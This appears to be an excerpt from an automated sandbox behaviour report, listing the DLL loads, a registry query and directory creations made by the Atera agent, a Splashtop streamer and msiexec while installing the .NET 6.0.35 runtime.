                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: smphost.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: mispace.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sxshared.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wmiclnt.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: virtdisk.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: resutils.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: clusapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: fmifs.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ulib.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ifsutil.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsp_fs.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: sscore.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsp_sr.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: tdh.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsp_health.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exeSection loaded: healthapi.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: wtsapi32.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: version.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: wldp.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: propsys.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: profapi.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: vaultcli.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: wintypes.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: edputil.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: iertutil.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: netutils.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: srvcli.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                Source: C:\Windows\System32\msiexec.exeFile written: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdsmpl.iniJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\sharedJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.AppJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-rtlsupport-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\msquic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceProcess.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encodings.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\WindowsBase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Expressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processenvironment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorlib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.UnmanagedMemoryStream.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
